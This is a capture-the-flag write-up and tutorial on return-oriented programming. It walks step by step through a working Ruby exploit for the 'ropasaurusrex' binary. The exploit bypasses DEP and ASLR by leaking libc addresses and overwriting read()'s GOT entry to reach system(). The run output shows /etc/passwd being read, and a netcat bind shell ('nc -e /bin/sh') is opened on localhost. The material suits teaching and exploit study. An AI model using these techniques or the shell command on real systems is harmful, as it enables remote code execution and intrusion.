One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That’s what ROP’s all about, after all!
Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn’t think to bypass ASLR for quite awhile), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I’ll take the same route on this post.
Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide! Coincidentally, I’ve been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I’d talk about it instead! This isn’t just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you’re more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)
What the heck is ROP?
ROP—return-oriented programming—is a modern name for a classic exploit called “return into libc”. The idea is that you found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way get your code into executable memory (DEP, or data execution prevention, means that you can’t run code from anywhere you want anymore).
With ROP, you can pick and choose pieces of code that are already in sections executable memory and followed by a ‘return’. Sometimes those pieces are simple, and sometimes they’re complicated. In this exercise, we only need the simple stuff, thankfully!
But, we’re getting ahead of ourselves. Let’s first learn a little more about the stack! I’m not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.
The stack
I’m sure you’ve heard of the stack before. Stack overflows? Smashing the stack? But what’s it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!
The simple idea is, let’s say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you’re in C(), the stack looks like this:
+----------------------+ | ... | (higher addresses) +----------------------+ +----------------------+ <-- start of 'A's stack frame | [return address] | <-- address of whatever called 'A' +----------------------+ | [frame pointer] | +----------------------+ | [local variables] | +----------------------+ +----------------------+ <-- start of 'B's stack frame | 2 (parameter)| +----------------------+ | 1 (parameter)| +----------------------+ | [return address] | <-- the address that 'B' returns to +----------------------+ | [frame pointer] | +----------------------+ | [local variables] | +----------------------+ +----------------------+ <-- start of 'C's stack frame | 4 (parameter)| +----------------------+ | 3 (parameter)| +----------------------+ | [return address] | <-- the address that 'C' returns to +----------------------+ +----------------------+ | ... | (lower addresses) +----------------------+
This is quite a mouthful (eyeful?) if you don’t live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new “stack frame” is built. A “frame” is simply some memory that the function allocates for itself on the stack. In fact, it doesn’t even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).
This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).
Have you ever wondered where a function’s local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you’d know: they wind up in an old stack frame that we return to later!
Now, let’s look at what’s stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):
- Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.
- Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.
- Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.
- Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.
So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they’re not. We’re going to assume the caller cleans up, that is, the function doesn’t clean up after itself, since that’s is how it works in this challenge (and most of the time on Linux).
Heaven, hell, and stack frames
The main thing you have to understand to know ROP is this: a function’s entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It’s all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn’t actually, don’t bother looking).
Let’s say you call the sleep() function, and get to the first line; its stack frame is going to look like this:
... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | +----------------------+ | [return address] | <-- esp points here +----------------------+ ... <-- not allocated, don't care territory (lower addresses)
When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won’t mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (ie, making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when it sleep() starts, the stack frame makes up its entire world.
When sleep() returns, it winds up looking like this:
... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | <-- esp points here +----------------------+ | [old return address] | <-- not allocated, don't care territory starts here now +----------------------+ ... (lower addresses)
And, of course, the caller, after sleep() returns, will remove “seconds” from the stack by adding 4 to esp (later on, we’ll talk about how we have to use pop/pop/ret constructs to do the same thing).
In a properly working system, this is how life works. That’s a safe assumption. The “seconds” value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?
Controlling the stack
…well, since you asked, let me tell you. We’ve all heard of a “stack overflow”, which involves overwriting a variable on the stack. What’s that mean? Well, let’s say we have a frame that looks like this:
... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | +----------------------+ | [return address] | <-- esp points here +----------------------+ | char buf[16] | | | | | | | +----------------------+ ... (lower addresses)
The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the last byte—little endian—of the return address. The 18th byte writes to the second-last byte of the return address, and so on. Therefore, we can change the return address to point to anywhere we want. Anywhere we want. So when the function returns, where’s it go? Well, it thinks it’s going to where it’s supposed to go—in a perfect world, it would be—but nope! In this case, it’s going to wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 (“AAAA”), it jumps there and probably crashes. If the attacker says to jump to the stack… well, that’s where it gets more complicated…
DEP
Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes.
So how the hell do I run code without being allowed to run code!?
Well, we’re going to get to that. But first, let’s look at the vulnerability that the challenge uses!
The vulnerability
Here’s the vulnerable function, fresh from IDA:
1 .text:080483F4vulnerable_function proc near 2 .text:080483F4 3 .text:080483F4buf = byte ptr -88h 4 .text:080483F4 5 .text:080483F4 push ebp 6 .text:080483F5 mov ebp, esp 7 .text:080483F7 sub esp, 98h 8 .text:080483FD mov dword ptr [esp+8], 100h ; nbytes 9 .text:08048405 lea eax, [ebp+buf] 10 .text:0804840B mov [esp+4], eax ; buf 11 .text:0804840F mov dword ptr [esp], 0 ; fd 12 .text:08048416 call _read 13 .text:0804841B leave 14 .text:0804841C retn 15 .text:0804841Cvulnerable_function endp
Now, if you don’t know assembly, this might look daunting. But, in fact, it’s simple. Here’s the equivalent C:
1 ssize_t __cdecl vulnerable_function() 2 { 3 char buf[136]; 4 return read(0, buf, 256); 5 }
So, it reads 256 bytes into a 136-byte buffer. Goodbye Mr. Stack!
You can easily validate that by running it, piping in a bunch of ‘A’s, and seeing what happens:
1 ron@debian-x86 ~ $ ulimit -c unlimited 2 ron@debian-x86 ~ $ perl -e "print 'A'x300" | ./ropasaurusrex 3 Segmentation fault (core dumped) 4 ron@debian-x86 ~ $ gdb ./ropasaurusrex core 5 [...] 6 Program terminated with signal 11, Segmentation fault. 7 #0 0x41414141 in ?? () 8 (gdb)
Simply speaking, it means that we overwrote the return address with the letter A 4 times (0x41414141 = “AAAA”).
Now, there are good ways and bad ways to figure out exactly what you control. I used a bad way. I put “BBBB” at the end of my buffer and simply removed ‘A’s until it crashed at 0x42424242 (“BBBB”):
1 ron@debian-x86 ~ $ perl -e "print 'A'x140;print 'BBBB'" | ./ropasaurusrex 2 Segmentation fault (core dumped) 3 ron@debian-x86 ~ $ gdb ./ropasaurusrex core 4 #0 0x42424242 in ?? ()
If you want to do this “better” (by which I mean, slower), check out Metasploit’s pattern_create.rb and pattern_offset.rb. They’re great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn’t bother.
Starting to write an exploit
The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we’re going to use netcat, which is just as good (for our purposes):
1 $ while true; do nc -vv -l -p 4444 -e ./ropasaurusrex; done 2 listening on [any] 4444 ...
From now on, we can use localhost:4444 as the target for our exploit and test if it’ll work against the actual server.
You may also want to disable ASLR if you’re following along:
1 $ sudo sysctl -w kernel.randomize_va_space=0
Note that this will make your system easier to exploit, so I don’t recommend doing this outside of a lab environment!
Here’s some ruby code for the initial exploit:
1 require 'socket' 2 3 $ cat ./sploit.rb 4 s = TCPSocket.new("localhost", 4444) 5 6 # Generate the payload 7 payload = "A"*140 + 8 [ 9 0x42424242, 10 ].pack("I*") # Convert a series of 'ints' to a string 11 12 s.write(payload) 13 s.close()
Run that with ruby ./sploit.rb and you should see the service crash:
1 connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53451 2 Segmentation fault (core dumped)
And you can verify, using gdb, that it crashed at the right location:
1 gdb --quiet ./ropasaurusrex core 2 [...] 3 Program terminated with signal 11, Segmentation fault. 4 #0 0x42424242 in ?? ()
We now have the beginning of an exploit!
How to waste time with ASLR
I called this section ‘wasting time’, because I didn’t realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let’s not worry about ASLR—in fact, let’s not even define ASLR. That’ll come up in the next section.
Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What’s the next step?
Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system(“cat /etc/passwd”), we’d be set! Once we do that, we can run any command. But doing that involves two things:
- Getting the string cat /etc/passwd into memory somewhere
- Running the system() function
Getting the string into memory
Getting the string into memory actually involves two sub-steps:
- Find some memory that we can write to
- Find a function that can write to it
Tall order? Not really! First things first, let’s find some memory that we can read and write! The most obvious place is the .data section:
1 ron@debian-x86 ~ $ objdump -x ropasaurusrex | grep -A1 '\.data' 2 23 .data 00000008 08049620 08049620 00000620 2**2 3 CONTENTS, ALLOC, LOAD, DATA 4
Uh oh, .data is only 8 bytes long. That’s not enough! In theory, any address that’s long enough, writable, and not used will be enough for what we need. Looking at the output for objdump -x, I see a section called .dynamic that seems to fit the bill:
1 2 20 .dynamic 000000d0 08049530 08049530 00000530 2**2 3 CONTENTS, ALLOC, LOAD, DATA
The .dynamic section holds information for dynamic linking. We don’t need that for what we’re going to do, so let’s choose address 0x08049530 to overwrite.
The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones that are in the executable itself, rather than a library, since the functions in the executable won’t change from system to system. Let’s look at what we have:
1 ron@debian-x86 ~ $ objdump -R ropasaurusrex 2 3 ropasaurusrex: file format elf32-i386 4 5 DYNAMIC RELOCATION RECORDS 6 OFFSET TYPE VALUE 7 08049600 R_386_GLOB_DAT __gmon_start__ 8 08049610 R_386_JUMP_SLOT __gmon_start__ 9 08049614 R_386_JUMP_SLOT write 10 08049618 R_386_JUMP_SLOT __libc_start_main 11 0804961c R_386_JUMP_SLOT read
So, we have read() and write() immediately available. That’s helpful! The read() function will read data from the socket and write it to memory. The prototype looks like this:
1 ssize_t read(int fd, void *buf, size_t count);
This means that, when you enter the read() function, you want the stack to look like this:
+----------------------+ | ... | - doesn't matter, other funcs will go here +----------------------+ +----------------------+ <-- start of read()'s stack frame | size_t count | - count, strlen("cat /etc/passwd") +----------------------+ | void *buf | - writable memory, 0x08049530 +----------------------+ | int fd | - should be 'stdin' (0) +----------------------+ | [return address] | - where 'read' will return +----------------------+ +----------------------+ | ... | - doesn't matter, read() will use for locals +----------------------+
We update our exploit to look like this (explanations are in the comments):
1 $ cat sploit.rb 2 require 'socket' 3 4 s = TCPSocket.new("localhost", 4444) 5 6 # The command we'll run 7 cmd = ARGV[0] + "\0" 8 9 # From objdump -x 10 buf = 0x08049530 11 12 # From objdump -D ./ropasaurusrex | grep read 13 read_addr = 0x0804832C 14 # From objdump -D ./ropasaurusrex | grep write 15 write_addr = 0x0804830C 16 17 # Generate the payload 18 payload = "A"*140 + 19 [ 20 cmd.length, # number of bytes 21 buf, # writable memory 22 0, # stdin 23 0x43434343, # read's return address 24 25 read_addr # Overwrite the original return 26 ].reverse.pack("I*") # Convert a series of 'ints' to a string 27 28 # Write the 'exploit' payload 29 s.write(payload) 30 31 # When our payload calls read() the first time, this is read 32 s.write(cmd) 33 34 # Clean up 35 s.close()
We run that against the target:
1 ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"
And verify that it crashes:
1 listening on [any] 4444 ... 2 connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53456 3 Segmentation fault (core dumped)
Then verify that it crashed at the return address of read() (0x43434343) and wrote the command to the memory at 0x08049530:
1 $ gdb --quiet ./ropasaurusrex core 2 [...] 3 Program terminated with signal 11, Segmentation fault. 4 #0 0x43434343 in ?? () 5 (gdb) x/s 0x08049530 6 0x8049530: "cat /etc/passwd"
Perfect!
Running it
Now that we’ve written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:
1 $ ldd ./ropasaurusrex 2 linux-gate.so.1 => (0xb7703000) 3 libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb75aa000) 4 /lib/ld-linux.so.2 (0xb7704000)
And libc.so.6 contains the system() function:
1 $ objdump -T /lib/i686/cmov/libc.so.6 | grep system 2 000f5470 g DF .text 00000042 GLIBC_2.0 svcerr_systemerr 3 00039450 g DF .text 0000007d GLIBC_PRIVATE __libc_system 4 00039450 w DF .text 0000007d GLIBC_2.0 system
We can figure out the address where system() ends up loaded in ropasaurusrex in our debugger:
1 $ gdb --quiet ./ropasaurusrex core 2 [...] 3 Program terminated with signal 11, Segmentation fault. 4 #0 0x43434343 in ?? () 5 (gdb) x/x system 6 0xb7ec2450 <system>: 0x890cec83
Because system() only takes one argument, building the stackframe is pretty easy:
+----------------------+ | ... | - doesn't matter, other funcs will go here +----------------------+ +----------------------+ <-- Start of system()'s stack frame | void *arg | - our buffer, 0x08049530 +----------------------+ | [return address] | - where 'system' will return +----------------------+ | ... | - doesn't matter, system() will use for locals +----------------------+
Now if we stack this on top of our read() frame, things are looking pretty good:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s stack frame | void *arg | +----------------------+ | [return address] | +----------------------+ +----------------------+ <-- Start of read()'s frame | size_t count | +----------------------+ | void *buf | +----------------------+ | int fd | +----------------------+ | [address of system] | <-- Stack pointer +----------------------+ +----------------------+ | ... | +----------------------+
At the moment that read() returns, the stack pointer is in the location shown above. When it returns, it pops read()’s return address off the stack and jumps to it. When it does, this is what the stack looks like when read() returns:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s frame | void *arg | +----------------------+ | [return address] | +----------------------+ +----------------------+ <-- Start of read()'s frame | size_t count | +----------------------+ | void *buf | +----------------------+ | int fd | <-- Stack pointer +----------------------+ | [address of system] | +----------------------+ +----------------------+ | ... | +----------------------+
Uh oh, that’s no good! The stack pointer is pointing to the middle of read()’s frame when we enter system(), not to the bottom of system()’s frame like we want it to! What do we do?
Well, when perform a ROP exploit, there’s a very important construct we need called pop/pop/ret. In this case, it’s actually pop/pop/pop/ret, which we’ll call “pppr” for short. Just remember, it’s enough “pops” to clear the stack, followed by a return.
pop/pop/pop/ret is a construct that we use to remove the stuff we don’t want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here’s what the stack looks like immediately after read() returns to a pop/pop/pop/ret:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s frame | void *arg | +----------------------+ | [return address] | +----------------------+ +----------------------+ <-- Special frame for pop/pop/pop/ret | [address of system] | +----------------------+ +----------------------+ <-- Start of read()'s frame | size_t count | +----------------------+ | void *buf | +----------------------+ | int fd | <-- Stack pointer +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ | ... | +----------------------+
After “pop/pop/pop/ret” runs, but before it returns, we get this:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s frame | void *arg | +----------------------+ | [return address] | +----------------------+ +----------------------+ <-- pop/pop/pop/ret's frame | [address of system] | <-- stack pointer +----------------------+ +----------------------+ | size_t count | <-- read()'s frame +----------------------+ | void *buf | +----------------------+ | int fd | +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ | ... | +----------------------+
Then when it returns, we’re exactly where we want to be:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s frame | void *arg | +----------------------+ | [return address] | <-- stack pointer +----------------------+ +----------------------+ <-- pop/pop/pop/ret's frame | [address of system] | +----------------------+ +----------------------+ <-- Start of read()'s frame | size_t count | +----------------------+ | void *buf | +----------------------+ | int fd | +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ | ... | +----------------------+
Finding a pop/pop/pop/ret is pretty easy using objdump:
1 $ objdump -d ./ropasaurusrex | egrep 'pop|ret' 2 [...] 3 80484b5: 5b pop ebx 4 80484b6: 5e pop esi 5 80484b7: 5f pop edi 6 80484b8: 5d pop ebp 7 80484b9: c3 ret
This lets us remove between 1 and 4 arguments off the stack before executing the next function. Perfect!
And remember, if you’re doing this yourself, ensure that the pops are at consecutive addresses. Using egrep to find them can be a little dangerous like that.
So now, if we want a triple pop and a ret (to remove the three arguments that read() used), we want the address 0x80484b6, so we set up our stack like this:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- Start of system()'s frame | void *arg | - 0x08049530 (buf) +----------------------+ | [return address] | - 0x44444444 +----------------------+ +----------------------+ | [address of system] | - 0xb7ec2450 +----------------------+ +----------------------+ <-- Start of read()'s frame | size_t count | - strlen(cmd) +----------------------+ | void *buf | - 0x08049530 (buf) +----------------------+ | int fd | - 0 (stdin) +----------------------+ | [address of "pppr"] | - 0x080484b6 +----------------------+ +----------------------+ | ... | +----------------------+
We also update our exploit with a s.read() at the end, to read whatever data the remote server sends us. The current exploit now looks like:
1 require 'socket' 2 3 s = TCPSocket.new("localhost", 4444) 4 5 # The command we'll run 6 cmd = ARGV[0] + "\0" 7 8 # From objdump -x 9 buf = 0x08049530 10 11 # From objdump -D ./ropasaurusrex | grep read 12 read_addr = 0x0804832C 13 # From objdump -D ./ropasaurusrex | grep write 14 write_addr = 0x0804830C 15 # From gdb, "x/x system" 16 system_addr = 0xb7ec2450 17 # From objdump, "pop/pop/pop/ret" 18 pppr_addr = 0x080484b6 19 20 # Generate the payload 21 payload = "A"*140 + 22 [ 23 # system()'s stack frame 24 buf, # writable memory (cmd buf) 25 0x44444444, # system()'s return address 26 27 # pop/pop/pop/ret's stack frame 28 system_addr, # pop/pop/pop/ret's return address 29 30 # read()'s stack frame 31 cmd.length, # number of bytes 32 buf, # writable memory (cmd buf) 33 0, # stdin 34 pppr_addr, # read()'s return address 35 36 read_addr # Overwrite the original return 37 ].reverse.pack("I*") # Convert a series of 'ints' to a string 38 39 # Write the 'exploit' payload 40 s.write(payload) 41 42 # When our payload calls read() the first time, this is read 43 s.write(cmd) 44 45 # Read the response from the command and print it to the screen 46 puts(s.read) 47 48 # Clean up 49 s.close()
And when we run it, we get the expected result:
1 $ ruby sploit.rb "cat /etc/passwd" 2 root:x:0:0:root:/root:/bin/bash 3 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 4 bin:x:2:2:bin:/bin:/bin/sh 5 ...
And if you look at the core dump, you’ll see it’s crashing at 0x44444444 as expected.
Done, right?
WRONG!
This exploit worked perfectly against my test machine, but when ASLR is enabled, it failed:
1 $ sudo sysctl -w kernel.randomize_va_space=1 2 kernel.randomize_va_space = 1 3 ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"
This is where it starts to get a little more complicated. Let’s go!
What is ASLR?
ASLR—or address space layout randomization—is a defense implemented on all modern systems (except for FreeBSD) that randomizes the address that libraries are loaded at. As an example, let’s run ropasaurusrex twice and get the address of system():
1 ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex 2 Segmentation fault (core dumped) 3 ron@debian-x86 ~ $ gdb ./ropasaurusrex core 4 Program terminated with signal 11, Segmentation fault. 5 #0 0x41414141 in ?? () 6 (gdb) x/x system 7 0xb766e450 <system>: 0x890cec83 8 9 ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex 10 Segmentation fault (core dumped) 11 ron@debian-x86 ~ $ gdb ./ropasaurusrex core 12 Program terminated with signal 11, Segmentation fault. 13 #0 0x41414141 in ?? () 14 (gdb) x/x system 15 0xb76a7450 <system>: 0x890cec83
Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That’s a problem!
Defeating ASLR
So, what do we know? Well, the binary itself isn’t ASLRed, which means that we can rely on every address in it to stay put, which is useful. Most importantly, the relocation table will remain at the same address:
1 $ objdump -R ./ropasaurusrex 2 3 ./ropasaurusrex: file format elf32-i386 4 5 DYNAMIC RELOCATION RECORDS 6 OFFSET TYPE VALUE 7 08049600 R_386_GLOB_DAT __gmon_start__ 8 08049610 R_386_JUMP_SLOT __gmon_start__ 9 08049614 R_386_JUMP_SLOT write 10 08049618 R_386_JUMP_SLOT __libc_start_main 11 0804961c R_386_JUMP_SLOT read
So we know the address—in the binary—of read() and write(). What’s that mean? Let’s take a look at their values while the binary is running:
1 $ gdb ./ropasaurusrex 2 (gdb) run 3 ^C 4 Program received signal SIGINT, Interrupt. 5 0xb7fe2424 in __kernel_vsyscall () 6 (gdb) x/x 0x0804961c 7 0x804961c: 0xb7f48110 8 (gdb) print read 9 $1 = {<text variable, no debug info>} 0xb7f48110 <read>
Well look at that.. a pointer to read() at a memory address that we know! What can we do with that, I wonder…? I’ll give you a hint: we can use the write() function—which we also know—to grab data from arbitrary memory and write it to the socket.
Finally, running some code!
Okay, let’s break, this down into steps. We need to:
- Copy a command into memory using the read() function.
- Get the address of the write() function using the write() function.
- Calculate the offset between write() and system(), which lets us get the address of system().
- Call system().
To call system(), we’re gonna have to write the address of system() somewhere in memory, then call it. The easiest way to do that is to overwrite the call to read() in the .plt table, then call read().
By now, you’re probably confused. Don’t worry, I was too. I was shocked I got this working. :)
Let’s just go for broke now and get this working! Here’s the stack frame we want:
+----------------------+ | ... | +----------------------+ +----------------------+ <-- system()'s frame [7] | void *arg | +----------------------+ | [return address] | +----------------------+ +----------------------+ <-- pop/pop/pop/ret's frame [6] | [address of read] | - this will actually jump to system() +----------------------+ +----------------------+ <-- second read()'s frame [5] | size_t count | - 4 bytes (the size of a 32-bit address) +----------------------+ | void *buf | - pointer to read() so we can overwrite it +----------------------+ | int fd | - 0 (stdin) +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ <-- pop/pop/pop/ret's frame [4] | [address of read] | +----------------------+ +----------------------+ <-- write()'s frame [3] | size_t count | - 4 bytes (the size of a 32-bit address) +----------------------+ | void *buf | - The address containing a pointer to read() +----------------------+ | int fd | - 1 (stdout) +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ <-- pop/pop/pop/ret's frame [2] | [address of write] | +----------------------+ +----------------------+ <-- read()'s frame [1] | size_t count | - strlen(cmd) +----------------------+ | void *buf | - writeable memory +----------------------+ | int fd | - 0 (stdin) +----------------------+ | [address of "pppr"] | +----------------------+ +----------------------+ | ... | +----------------------+
Holy smokes, what’s going on!?
Let’s start at the bottom and work our way up! I tagged each frame with a number for easy reference.
Frame [1] we’ve seen before. It writes cmd into our writable memory. Frame [2] is a standard pop/pop/pop/ret to clean up the read().
Frame [3] uses write() to write the address of the read() function to the socket. Frame [4] uses a standard pop/pop/pop/ret to clean up after write().
Frame [5] reads another address over the socket and writes it to memory. This address is going to be the address of the system() call. The reason writing it to memory works is because of how read() is called. Take a look at the read() call we’ve been using in gdb (0x0804832C) and you’ll see this:
1 (gdb) x/i 0x0804832C 2 0x804832c <read@plt>: jmp DWORD PTR ds:0x804961c
read() is actually implemented as an indirect jump! So if we can change what ds:0x804961c’s value is, and still jump to it, then we can jump anywhere we want! So in frame [3] we read the address from memory (to get the actual address of read()) and in frame [5] we write a new address there.
Frame [6] is a standard pop/pop/pop/ret construct, with a small difference: the return address of the pop/pop/pop/ret is 0x804832c, which is actually read()’s .plt entry. Since we overwrote read()’s .plt entry with system(), this call actually goes to system()!
Final code
Whew! That’s quite complicated. Here’s code that implements the full exploit for ropasaurusrex, bypassing both DEP and ASLR:
1 require 'socket' 2 3 s = TCPSocket.new("localhost", 4444) 4 5 # The command we'll run 6 cmd = ARGV[0] + "\0" 7 8 # From objdump -x 9 buf = 0x08049530 10 11 # From objdump -D ./ropasaurusrex | grep read 12 read_addr = 0x0804832C 13 # From objdump -D ./ropasaurusrex | grep write 14 write_addr = 0x0804830C 15 # From gdb, "x/x system" 16 system_addr = 0xb7ec2450 17 # Fram objdump, "pop/pop/pop/ret" 18 pppr_addr = 0x080484b6 19 20 # The location where read()'s .plt entry is 21 read_addr_ptr = 0x0804961c 22 23 # The difference between read() and system() 24 # Calculated as read (0xb7f48110) - system (0xb7ec2450) 25 # Note: This is the one number that needs to be calculated using the 26 # target version of libc rather than my own! 27 read_system_diff = 0x85cc0 28 29 # Generate the payload 30 payload = "A"*140 + 31 [ 32 # system()'s stack frame 33 buf, # writable memory (cmd buf) 34 0x44444444, # system()'s return address 35 36 # pop/pop/pop/ret's stack frame 37 # Note that this calls read_addr, which is overwritten by a pointer 38 # to system() in the previous stack frame 39 read_addr, # (this will become system()) 40 41 # second read()'s stack frame 42 # This reads the address of system() from the socket and overwrites 43 # read()'s .plt entry with it, so calls to read() end up going to 44 # system() 45 4, # length of an address 46 read_addr_ptr, # address of read()'s .plt entry 47 0, # stdin 48 pppr_addr, # read()'s return address 49 50 # pop/pop/pop/ret's stack frame 51 read_addr, 52 53 # write()'s stack frame 54 # This frame gets the address of the read() function from the .plt 55 # entry and writes to to stdout 56 4, # length of an address 57 read_addr_ptr, # address of read()'s .plt entry 58 1, # stdout 59 pppr_addr, # retrurn address 60 61 # pop/pop/pop/ret's stack frame 62 write_addr, 63 64 # read()'s stack frame 65 # This reads the command we want to run from the socket and puts it 66 # in our writable "buf" 67 cmd.length, # number of bytes 68 buf, # writable memory (cmd buf) 69 0, # stdin 70 pppr_addr, # read()'s return address 71 72 read_addr # Overwrite the original return 73 ].reverse.pack("I*") # Convert a series of 'ints' to a string 74 75 # Write the 'exploit' payload 76 s.write(payload) 77 78 # When our payload calls read() the first time, this is read 79 s.write(cmd) 80 81 # Get the result of the first read() call, which is the actual address of read 82 this_read_addr = s.read(4).unpack("I").first 83 84 # Calculate the address of system() 85 this_system_addr = this_read_addr - read_system_diff 86 87 # Write the address back, where it'll be read() into the correct place by 88 # the second read() call 89 s.write([this_system_addr].pack("I")) 90 91 # Finally, read the result of the actual command 92 puts(s.read()) 93 94 # Clean up 95 s.close()
And here it is in action:
1 $ ruby sploit.rb "cat /etc/passwd" 2 root:x:0:0:root:/root:/bin/bash 3 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 4 bin:x:2:2:bin:/bin:/bin/sh 5 sys:x:3:3:sys:/dev:/bin/sh 6 [...]
You can, of course, change cat /etc/passwd to anything you want (including a netcat listener!)
1 ron@debian-x86 ~ $ ruby sploit.rb "pwd" 2 /home/ron 3 ron@debian-x86 ~ $ ruby sploit.rb "whoami" 4 ron 5 ron@debian-x86 ~ $ ruby sploit.rb "nc -vv -l -p 5555 -e /bin/sh" & 6 [1] 3015 7 ron@debian-x86 ~ $ nc -vv localhost 5555 8 debian-x86.skullseclabs.org [127.0.0.1] 5555 (?) open 9 pwd 10 /home/ron 11 whoami 12 ron
Conclusion
And that’s it! We just wrote a reliable, DEP/ASLR-bypassing exploit for ropasaurusrex.
Feel free to comment or contact me if you have any questions!
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...